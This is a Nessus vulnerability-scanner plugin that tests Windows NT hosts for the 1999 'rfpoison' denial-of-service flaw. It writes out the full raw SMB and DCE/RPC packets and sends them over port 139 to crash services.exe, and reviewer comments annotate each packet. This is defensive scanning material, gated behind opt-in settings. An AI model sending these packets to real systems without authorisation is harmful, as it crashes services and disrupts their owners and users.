#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: when Nessus loads the plugin with `description` set,
# only the metadata below is recorded and the script exits before any
# network activity.
if (description)
{
script_id(10204);
script_version("1.29");
script_cvs_date("Date: 2018/11/15 20:50:28");
script_cve_id("CVE-1999-0980");
script_bugtraq_id(754);
script_name(english:"Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS");
script_summary(english:"Crashes the remote host using the 'rfpoison' attack");
script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
script_set_attribute(attribute:"description", value:
"An 'rfpoison' packet has been sent to the remote host. This packet is
supposed to crash the 'services.exe' process, making the system
unstable.");
script_set_attribute(attribute:"see_also", value:"https://support.microsoft.com/en-us/support/kb/articles/q231/4/57.asp");
script_set_attribute(attribute:"solution", value:
"Apply NT4 last service pack, or better, upgrade to Windows last
version.");
# Availability-only impact, network vector, no authentication.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1999/10/31");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/01");
# The plugin never verifies the crash it tries to cause; the finding is
# marked potential for that reason.
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
# ACT_DENIAL: this plugin is destructive and only runs in the
# denial-of-service phase of a scan.
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
script_family(english:"Windows");
# Opt-in only: requires the paranoid reporting setting, plus an open
# NetBIOS session port.
script_require_keys("Settings/ParanoidReport");
script_require_ports(139);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
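# Opt-in only: the plugin is a denial-of-service test, so it runs solely
# when the scan policy enables paranoid reporting.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# Skip hosts whose SMB-reported Windows version is newer than NT 4.0
# (the advisory and solution text cover NT4 only).  The major version is
# anchored at the start of the string and two-digit majors are accepted,
# so "10.0" is treated as newer; the previous pattern "[5-9]\." did not
# match it and the crafted request would have been sent to such hosts.
# When the version is unknown the test still proceeds, as before.
version = get_kb_item("SMB/WindowsVersion");
if (version && ereg(pattern:"^([5-9]|[1-9][0-9]+)\.", string:version))
  audit(AUDIT_OS_NOT, "Windows NT 4.0");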
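# The NetBIOS session service on port 139 must be reachable; record why
# we stop instead of falling through silently as the original did.
if (!get_port_state(139)) audit(AUDIT_PORT_CLOSED, 139);

soc = open_sock_tcp(139);
if (!soc) audit(AUDIT_SOCK_FAIL, 139);

#
# This is the result of rfp's secret program. I don't pretend
# I understand it, but it works.
#
# Reviewer's reading of the bytes below (the strings are plain ASCII /
# UTF-16 inside each packet; the fixed fields are read against the SMB
# and DCE/RPC wire formats, so treat the field names as an interpretation
# rather than a spec citation):
#
# The first six packets are an ordinary SMB handshake that ends with a
# handle on the \srvsvc named pipe; only the seventh is the malformed
# request.  Each handshake step must get a reply: if the pipe was never
# reached, the final request cannot have been processed by the Server
# service and reporting a hole would be a false positive.  The original
# discarded every reply and reported unconditionally.

# 1. NetBIOS session request (message type 0x81).  The encoded called
#    name decodes to "*SMBSERVER", matching the tree-connect path below.
nb_session = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);

# 2. SMB_COM_NEGOTIATE (0x72) offering the dialects visible in clear text,
#    from "PC NETWORK PROGRAM 1.0" through "NT LM 0.12".
smb_negotiate = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);

# 3. SMB_COM_SESSION_SETUP_ANDX (0x73) with no password bytes and the
#    strings "WORKGROUP", "Unix", "Samba" — looks like an anonymous
#    (null) session; the handshake therefore needs no credentials.
smb_session_setup = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);

# 4. SMB_COM_TREE_CONNECT_ANDX (0x75) to \\*SMBSERVER\IPC$, service "IPC".
smb_tree_connect = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);

# 5. SMB_COM_NT_CREATE_ANDX (0xa2) opening the named pipe "\srvsvc".
smb_nt_create = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);

# 6. SMB_COM_TRANSACTION (0x25) on "\PIPE\" carrying a DCE/RPC bind
#    (version 5.0, packet type 0x0b); the two 16-byte blocks after the
#    context id look like the srvsvc interface UUID and the NDR transfer
#    syntax.
dcerpc_bind = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);

# 7. SMB_COM_TRANSACTION (0x25) carrying the DCE/RPC request (packet type
#    0x00, opnum 0x0f) whose UTF-16 server name is "\\*SMBSERVER"; this
#    is the malformed resource-enumeration call the advisory describes.
dcerpc_request = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);

# Run the handshake in order; stop (without reporting) at the first step
# that gets no reply, since the pipe was then never opened.
handshake = make_list(nb_session, smb_negotiate, smb_session_setup,
                      smb_tree_connect, smb_nt_create, dcerpc_bind);
foreach pkt (handshake)
{
  send(socket:soc, data:pkt);
  r = recv(socket:soc, length:1024);
  if (isnull(r) || strlen(r) == 0)
  {
    close(soc);
    audit(AUDIT_RESP_BAD, 139);
  }
}

# Deliver the malformed request.  No reply is expected from an affected
# host; the read only drains whatever comes back, as the original did.
send(socket:soc, data:dcerpc_request);
recv(socket:soc, length:1024);
close(soc);

# NOTE(review): there is still no post-check that the target was actually
# affected (the plugin is flagged potential_vulnerability for that reason);
# the finding records that the request was delivered to the pipe, not a
# confirmed crash.
security_hole(port:139);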